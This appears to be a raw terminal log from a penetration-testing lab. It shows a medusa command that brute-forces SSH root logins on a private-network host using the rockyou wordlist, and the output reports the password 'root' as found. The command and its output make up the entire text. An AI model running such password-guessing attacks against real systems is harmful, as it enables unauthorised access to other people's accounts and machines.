1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| ⚡ root@kali ~/Desktop/test/metasploit2 medusa -h 192.168.111.171 -M ssh -u root -P /usr/share/wordlists/rockyou.txt -t 12 -f Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 192.168.111.171 User: root Pass: abc123 ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 192.168.111.171 User: root Pass: 12345678 ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: root (1 of 14344393 complete) ACCOUNT FOUND: [ssh] Host: 192.168.111.171 User: root Password: root [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: msfadmin (2 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 123456 (3 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 12345 (4 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: princess (5 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: password (6 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: rockyou (7 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 123456789 (8 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: iloveyou (9 of 14344393 complete) ACCOUNT CHECK: [ssh] Host: 192.168.111.171 (1 of 1, 0 complete) User: root (1 of 1, 1 complete) Password: 1234567 (10 of 14344393 complete) ERROR: ssh.mod: Failed establishing SSH session (2/4): Host: 192.168.111.171 User: root Pass: 12345678 ERROR: ssh.mod: Failed establishing SSH session (2/4): Host: 192.168.111.171 User: root Pass: abc123 ERROR: ssh.mod: Failed establishing SSH session (3/4): Host: 192.168.111.171 User: root Pass: abc123 ERROR: ssh.mod: Failed establishing SSH session (3/4): Host: 192.168.111.171 User: root Pass: 12345678 ERROR: ssh.mod: Failed establishing SSH session (4/4): Host: 192.168.111.171 User: root Pass: abc123 NOTICE: [ssh] Host: 192.168.111.171 - Login thread (11) prematurely ended. The current number of parallel login threads may exceed what this service can reasonably handle. The total number of threads for this host will be decreased. NOTICE: [ssh] Host: 192.168.111.171 User: root Password: abc123 - The noted credentials have been added to the end of the queue for testing. ERROR: ssh.mod: Failed establishing SSH session (4/4): Host: 192.168.111.171 User: root Pass: 12345678 ERROR: ssh.mod: Failed establishing SSH session. The following credentials have been added to the missed queue for later testing: Host: 192.168.111.171 User: root Pass: abc123 NOTICE: [ssh] Host: 192.168.111.171 - Login thread (9) prematurely ended. The current number of parallel login threads may exceed what this service can reasonably handle. The total number of threads for this host will be decreased. NOTICE: [ssh] Host: 192.168.111.171 User: root Password: 12345678 - The noted credentials have been added to the end of the queue for testing. ERROR: ssh.mod: Failed establishing SSH session. The following credentials have been added to the missed queue for later testing: Host: 192.168.111.171 User: root Pass: 12345678
|